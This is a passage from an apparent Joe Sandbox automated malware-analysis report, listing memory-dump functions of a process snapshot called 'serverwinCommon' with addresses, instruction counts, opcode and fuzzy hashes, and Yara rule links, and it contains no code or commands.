                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0dc3456eb8541972203cfd0270171511675c96db5f777793aa7e65abe00de006
                          • Instruction ID: 813d9ea690e7b840a9e0d9a5ebd50fdb6ce2be3cc80166b43d4a96ea8a3f1ff6
                          • Opcode Fuzzy Hash: 0dc3456eb8541972203cfd0270171511675c96db5f777793aa7e65abe00de006
                          • Instruction Fuzzy Hash: CD319470E1562ECEDBA4DB98C864BACB7F1FB58301F5142AAD00DE32A1DB745A84CB51
                          Function 00007FFD9B750AA1 Relevance: .1, Instructions: 80COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8966b778078686b11b78be4a6904f502c203644c5e468a6c4d49332e8a66b43a
                          • Instruction ID: 75afd52b2465b8afa3d3e1f886022d3c2fd151ebd8c108fc978ad6d3b6f95a55
                          • Opcode Fuzzy Hash: 8966b778078686b11b78be4a6904f502c203644c5e468a6c4d49332e8a66b43a
                          • Instruction Fuzzy Hash: C7219235E5E60E4FE7A1EBE898659B937E1FF56700F0206B6D018C70B6EE64A9458700
                          Function 00007FFD9B752F25 Relevance: .1, Instructions: 80COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4062a75ffdf5a10569733b7c2d0ccec1a7bd0b0cfea2c3fac880e4dad304da16
                          • Instruction ID: 2b42b8b4b40af65add3c6495d3dd49f625e0a3947183c42efd32e9c48b204022
                          • Opcode Fuzzy Hash: 4062a75ffdf5a10569733b7c2d0ccec1a7bd0b0cfea2c3fac880e4dad304da16
                          • Instruction Fuzzy Hash: B0219F71B1A60E8EE761EAE4DC686B973E0EF14310F060A36D409CA1F5EEB8A6458640
                          Function 00007FFD9B760DDA Relevance: .1, Instructions: 80COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18153e27917f9971157a71c29f403fefe264b6a3bfa68655766fffccd7e6bf81
                          • Instruction ID: ec1ac7e077336acf416d8d911d7efc0bed5459b0effaf577b88b6eadceef5f90
                          • Opcode Fuzzy Hash: 18153e27917f9971157a71c29f403fefe264b6a3bfa68655766fffccd7e6bf81
                          • Instruction Fuzzy Hash: CA31D534E0962DCFDB68DF94D8A46EDB7B1AF55311F1141AAD10EA76A0CA346A84CF01
                          Function 00007FFD9B766C49 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca1917a0ae2ffb6b49dd96b072ed52dd2e315df9c6da79553b686a56194805f6
                          • Instruction ID: 16ebd86b7face38394c1be93171f8801c97a416c039ea1e31fb04312223e18bf
                          • Opcode Fuzzy Hash: ca1917a0ae2ffb6b49dd96b072ed52dd2e315df9c6da79553b686a56194805f6
                          • Instruction Fuzzy Hash: 4521E671A0EB8E8FEB659F6848252F97AA0FF15301F4502BAD41CC20F2EE34A5548742
                          Function 00007FFD9B753481 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c867cca11f04e786d5902009a94eec2f520fb1d8fa8658f775668ab3527413b6
                          • Instruction ID: 2959a025cbc193e8990dc9880c05ad4045e47d2d3ba45772d5002f7465e9f79e
                          • Opcode Fuzzy Hash: c867cca11f04e786d5902009a94eec2f520fb1d8fa8658f775668ab3527413b6
                          • Instruction Fuzzy Hash: 64216F31E0A64E8FEBA5EFA488295BA37A0FF14305F0205BAD41EC71B2DB75A6518750
                          Function 00007FFD9B766B21 Relevance: .1, Instructions: 66COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1139b711806bf6990a1257bd7154c12c67176574792cc6aea68c9e9b3ba5b789
                          • Instruction ID: 90d54041629582e81662b1b5ef006d0ba72a9daf1139874f5f3f8f5a3aee6edf
                          • Opcode Fuzzy Hash: 1139b711806bf6990a1257bd7154c12c67176574792cc6aea68c9e9b3ba5b789
                          • Instruction Fuzzy Hash: DF11AF30A0964ECFDB98EFA884652BD7BB0FF64301F5445BED41DC75A6CA34A540C741
                          Function 00007FFD9B7638FA Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 674eba3e18c19ae090bfcf3135e13665e99cfb299e0e662b851c39c7ce5ca1ef
                          • Instruction ID: 4d1a4bc62d116953a7742872bf707e079c61ffda8e311dff18f5fe5e9977f4b9
                          • Opcode Fuzzy Hash: 674eba3e18c19ae090bfcf3135e13665e99cfb299e0e662b851c39c7ce5ca1ef
                          • Instruction Fuzzy Hash: 6421F931A0E78E8EE751E7AC88695B57FE0FF55314B0605BAD408C70B3DA346644C762
                          Function 00007FFD9B75C7D3 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f043bb9c59a30b8cedea1487ac918f8568292f7de8f8a4198938d27d062c170
                          • Instruction ID: 9f94189d851dd968c44b90bd77f662f1ad7465fbe5cbfcbdb6362af5c5d06f35
                          • Opcode Fuzzy Hash: 8f043bb9c59a30b8cedea1487ac918f8568292f7de8f8a4198938d27d062c170
                          • Instruction Fuzzy Hash: A5112935A0E78E5ED765ABA898242F87BA0EF46310F4505BBD008C70B2CA647A558340
                          Function 00007FFD9B762518 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5f89cf1178612b3ff9e64ff3a54122c17edb38313ef95ed0d44e404454251c4
                          • Instruction ID: 4e7fb3a0e8d92e88e65dc5d6fb773e8f91720ab484575dc5489337bce2ea88b5
                          • Opcode Fuzzy Hash: f5f89cf1178612b3ff9e64ff3a54122c17edb38313ef95ed0d44e404454251c4
                          • Instruction Fuzzy Hash: 88216D2090E38A8FD7A69BB088355A47FB0EF16300B1A45FFC449CB0F3DA295906C712
                          Function 00007FFD9B764585 Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a2f33d04e56cebd166771c6f4538fd14647ea1969f67d188454d94e5e95d1ed
                          • Instruction ID: a307a60b1d27a0b0c3a13ce51323af83a80c309a7bc74825011f756df1802fbf
                          • Opcode Fuzzy Hash: 1a2f33d04e56cebd166771c6f4538fd14647ea1969f67d188454d94e5e95d1ed
                          • Instruction Fuzzy Hash: 2E11B170A0A64E8FDB94EF68C4692BD3BA0FF68301F0502BED41DC71B6CA346540C742
                          Function 00007FFD9B75BF89 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ec59d3b1299c35a66c6d6a3b87e74e3c52e4e554fe28857ffa90c88dc3ae1a9
                          • Instruction ID: 1b236d15ae888d0661a1bdec3237fbca40310895306aceab27bde18e3260a452
                          • Opcode Fuzzy Hash: 0ec59d3b1299c35a66c6d6a3b87e74e3c52e4e554fe28857ffa90c88dc3ae1a9
                          • Instruction Fuzzy Hash: B6118130E0E78E8FEBA5DFA48C655B93BB0FF15300F0505BAD819C61F2DA74A6558B40
                          Function 00007FFD9B7644E9 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 545bb32c2dd2e84a0745ef168d6b65f2010a236e41decec912b437c43678e3c9
                          • Instruction ID: 729c6ccedd1b9989b7c132f23af9914224369d635afd4c7e4f10f7eb363bd830
                          • Opcode Fuzzy Hash: 545bb32c2dd2e84a0745ef168d6b65f2010a236e41decec912b437c43678e3c9
                          • Instruction Fuzzy Hash: 1821AE30A0A68E8FEB99EF6884692B97BA1FF69301F0102BFD419C71B2DA346544C741
                          Function 00007FFD9B764A25 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0ea14ddf703acb21ee4c289b4cf359120a105a6f6b9a0062e7ba69392ca6589
                          • Instruction ID: 01dbeb36558c1dba26387426bbb296fa661c3986e7d551f772c528b07842fa6d
                          • Opcode Fuzzy Hash: a0ea14ddf703acb21ee4c289b4cf359120a105a6f6b9a0062e7ba69392ca6589
                          • Instruction Fuzzy Hash: 29110675A0EA4A9FEB58DEA488B52B83BA1FF15300F0541BEC41DC75F3CA396545C702
                          Function 00007FFD9B766CE5 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a831bece0be85a5cef93b78b5a8073c6850314a5f5624a44746204156edcbd87
                          • Instruction ID: 7185753151f35b6910baad07fc4dc7073d63a275465445793e6949477d7d70f9
                          • Opcode Fuzzy Hash: a831bece0be85a5cef93b78b5a8073c6850314a5f5624a44746204156edcbd87
                          • Instruction Fuzzy Hash: 09112271A0AA8D8FEB699E6488751B87BE0FF25300F4501BED41DC60F2DF25A904D302
                          Function 00007FFD9B762701 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd6eda1d8d2a46a13f3fd8602e1b5a8cd50c087e9826506c2e46974fefc3387d
                          • Instruction ID: 2bbfcd7b3e7e7cf6235ae720e056178cff532f7130c019b3b184412246fcce56
                          • Opcode Fuzzy Hash: bd6eda1d8d2a46a13f3fd8602e1b5a8cd50c087e9826506c2e46974fefc3387d
                          • Instruction Fuzzy Hash: 4811C830D0964E8ED792ABB484589F97BF4EF19301F0505B2E418C7075EA349244C701
                          Function 00007FFD9B764D99 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4571c34d878aad44a9bd4461be51c64d07222c1ae0b6f00879ffac5e779726bd
                          • Instruction ID: 7c943aedd00a5375316b7f70dd055db81e1c71de1f8450f8808fc3069c7884dc
                          • Opcode Fuzzy Hash: 4571c34d878aad44a9bd4461be51c64d07222c1ae0b6f00879ffac5e779726bd
                          • Instruction Fuzzy Hash: EE118131E0A78E8FEB59EB6488696BD7BE0FF15300F0505BED419C71B2DA7469408741
                          Function 00007FFD9B75CC40 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4e6c7fafb79e23f087b21bac8ed938fc60d23c555f7d962e2237acd2cd92d5ca
                          • Instruction ID: c3ebb97173da7ea609dc4740fb351fa679b703c2e31a9978e1f96a6285d6af56
                          • Opcode Fuzzy Hash: 4e6c7fafb79e23f087b21bac8ed938fc60d23c555f7d962e2237acd2cd92d5ca
                          • Instruction Fuzzy Hash: 6111B230A09A0E8EEBA8EF6884656FD76A0FF28305F50067AD41DD21F5EE31B140C741
                          Function 00007FFD9B7527AD Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3246e4e81f7cd4f5552617274360267cfd20620df12a16c6b851e454c66f65e0
                          • Instruction ID: 1d92f95fd8fb81eccf019adbbc3c2634bba74b15a13400b4f43a14b85276e0fd
                          • Opcode Fuzzy Hash: 3246e4e81f7cd4f5552617274360267cfd20620df12a16c6b851e454c66f65e0
                          • Instruction Fuzzy Hash: 5E119431A0A74E8BEB69DFE488252B937A4FF15301F41497EE81DC61F2DB78A551CB40
                          Function 00007FFD9B7511AD Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8eefc8e49034ea593e437f374a3e555c3da65c3d8724c9eec575a8a9590e3a05
                          • Instruction ID: 7cff8be770dc56274daa67508371f0a8a80ff932d3cac9ae639461f5b17be1b9
                          • Opcode Fuzzy Hash: 8eefc8e49034ea593e437f374a3e555c3da65c3d8724c9eec575a8a9590e3a05
                          • Instruction Fuzzy Hash: DB11B271E0A64E4FEB64DBE488796B97BE0EF25302F1106BEC01AC75F1EE656645C700
                          Function 00007FFD9B762E75 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a02ef64d8f3e765da6cc174893634ecaf060d4497703e83af14a1d798d5ac5f
                          • Instruction ID: 23053aa5ea7168bca5d27271482fa555870fe4b69a445bcaf4decd7a5956f6e4
                          • Opcode Fuzzy Hash: 4a02ef64d8f3e765da6cc174893634ecaf060d4497703e83af14a1d798d5ac5f
                          • Instruction Fuzzy Hash: F0118631E0964E9FE791EBA4886D5B97BF1FF15300F0505B6D41CC70B6EE34A6448741
                          Function 00007FFD9B75AB48 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd2e5f15392b5b33c9ba149f971631c77c5f3075f272baaa0815c73aea2e9c0e
                          • Instruction ID: e4aacee1da4f1d0bf2f75c317c9034ca58de72ad8f967b9773f7aea58b20d4d2
                          • Opcode Fuzzy Hash: fd2e5f15392b5b33c9ba149f971631c77c5f3075f272baaa0815c73aea2e9c0e
                          • Instruction Fuzzy Hash: CF114F30A1960E8FDB94EF68C4695BD77F0FF18305F10057AE41AD31A4CB34A540C741
                          Function 00007FFD9B75BB35 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e01209955386a7e679d0fba8bf47cebad7af65bcc6aae48f98d646d29391c22
                          • Instruction ID: 573f5cef3344b50978c5f2bd95a809c788bf2198b4be2487fc1b4d2076ba00b1
                          • Opcode Fuzzy Hash: 5e01209955386a7e679d0fba8bf47cebad7af65bcc6aae48f98d646d29391c22
                          • Instruction Fuzzy Hash: 3A117030E0964E8FDB94EFA488686BD7BF0FF18301F1105BAD459C71B5DAB596408700
                          Function 00007FFD9B764B4D Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c82d66f74bc6458f13f7da00ecd8316dc962be17d3702d950286458101428869
                          • Instruction ID: ca64fe391c53d979bf038d79a0866aaa80224f7a46e2aa4124bf8f919d9f1e79
                          • Opcode Fuzzy Hash: c82d66f74bc6458f13f7da00ecd8316dc962be17d3702d950286458101428869
                          • Instruction Fuzzy Hash: 3C118C70A0A64A8FEB94EF64C8A96BA77F0FF25300F0506BEC41DC75A6DE3865418702
                          Function 00007FFD9B767A91 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 540e1c220b37ce808d417074e4235daaa3d5a1bf0439310160f14c20a9771b30
                          • Instruction ID: 7f837c559165945c51e0db49136ba63522bcdc0ba88193872a0c6aafc4f57150
                          • Opcode Fuzzy Hash: 540e1c220b37ce808d417074e4235daaa3d5a1bf0439310160f14c20a9771b30
                          • Instruction Fuzzy Hash: 9901AD30A0A64E9FDB59EF68C4685B97BA0EF18300F1205BED40AC70A2DA35A644C701
                          Function 00007FFD9B75C725 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48ca761ed7c9adc1c8c72c301acf1540b6ec41e4e0aefbc2ff2c854056b8a5cb
                          • Instruction ID: e26bcfa82bd34e09d7e6688fef9f8070a373c1abb24f38b82f2c0472e22b1271
                          • Opcode Fuzzy Hash: 48ca761ed7c9adc1c8c72c301acf1540b6ec41e4e0aefbc2ff2c854056b8a5cb
                          • Instruction Fuzzy Hash: 2A115E30A0560E8FDBA4EF68C899ABE77E0FF58305F10057AD419D31A4DB70A691CB80
                          Function 00007FFD9B765E39 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a839e62f90de20d9f0abde4e4f810d1e74b0bc458a87fd6ace586020ce458184
                          • Instruction ID: fee4f7c0e5d5d60e8489480a871c147a151de432c72aa3c9527271ecd3323184
                          • Opcode Fuzzy Hash: a839e62f90de20d9f0abde4e4f810d1e74b0bc458a87fd6ace586020ce458184
                          • Instruction Fuzzy Hash: 40119131A0A68E8EEB91AB74886D6A97BE0FF15300F0505B6C408CB0B2DA34A5448702
                          Function 00007FFD9B752E41 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28f6e87d705ff86bd570beaaa87ff0dac8c68c248dd2201954794197b1be6a11
                          • Instruction ID: c361a8d43a85a1b6dad1191dd29bb951684bb0cdc6f68a6e2149d85369c457dd
                          • Opcode Fuzzy Hash: 28f6e87d705ff86bd570beaaa87ff0dac8c68c248dd2201954794197b1be6a11
                          • Instruction Fuzzy Hash: 8601D431E0A78E8FE760ABE4C46C5A93AE0FF19300F0246B6D408C60B2EE74E6818600
                          Function 00007FFD9B75C710 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00e0072d8ec4f80d03e4672b08805f54a66da088a5f9c66bc5756336683b5694
                          • Instruction ID: b7d9e8f114ee00fcca079d17370880dd629869b7cf437a20f08db75c4e53fbad
                          • Opcode Fuzzy Hash: 00e0072d8ec4f80d03e4672b08805f54a66da088a5f9c66bc5756336683b5694
                          • Instruction Fuzzy Hash: 16111230A1590E8FDF94EF68C4A86B977E0FF18305F11057AD41EC72A5DA70A650CB40
                          Function 00007FFD9B764D0D Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac1c57d7e3f2a221e869e06988d1d886f982825e141b24647d4ebb59177e0892
                          • Instruction ID: 7771c54a54315e2c42136865e0d5b2794e0dd2edb0a74a4665406137cd659bec
                          • Opcode Fuzzy Hash: ac1c57d7e3f2a221e869e06988d1d886f982825e141b24647d4ebb59177e0892
                          • Instruction Fuzzy Hash: 18119E30E0A64A8FEB59EB6484696B977A0FF25300F0505BED42DC71F2DF35A940D702
                          Function 00007FFD9B76348D Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b2db66b3f8effbd36343fe82bf1593eb0e9a087f5df7e921493c925e57ca07a
                          • Instruction ID: 683c47dbda9a3399dc871cd0c77be9c2d3a6d9ec603c07cc2d1ed2407fe27fb3
                          • Opcode Fuzzy Hash: 8b2db66b3f8effbd36343fe82bf1593eb0e9a087f5df7e921493c925e57ca07a
                          • Instruction Fuzzy Hash: 0611A931F0A64E8EEB51EB6888696F9BBE0FF15304F0605B6D41CC70B6DE34A644C751
                          Function 00007FFD9B764F35 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bda49f4485cbc6bb94fcf36e05139f8536f8ab31f5e3f614d31d1f0503309885
                          • Instruction ID: b9bf1161a5a8f78855fdff9b5ce361f687373f56a089454a377eec0c6c691234
                          • Opcode Fuzzy Hash: bda49f4485cbc6bb94fcf36e05139f8536f8ab31f5e3f614d31d1f0503309885
                          • Instruction Fuzzy Hash: 76017531A1A64E8FD751EBA4D4595E977E0FF15301F0645BAD418C70B6DE38A540C701
                          Function 00007FFD9B76799C Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8aea69b3265302c5a68b7a46fa767daa95ecc402ed3dfbf50d71ebcc30214cb3
                          • Instruction ID: 7c8f59ba9ff51dbe03b48944c8a329a3c75bca3c00f04a1c976c1eaeaddf62d5
                          • Opcode Fuzzy Hash: 8aea69b3265302c5a68b7a46fa767daa95ecc402ed3dfbf50d71ebcc30214cb3
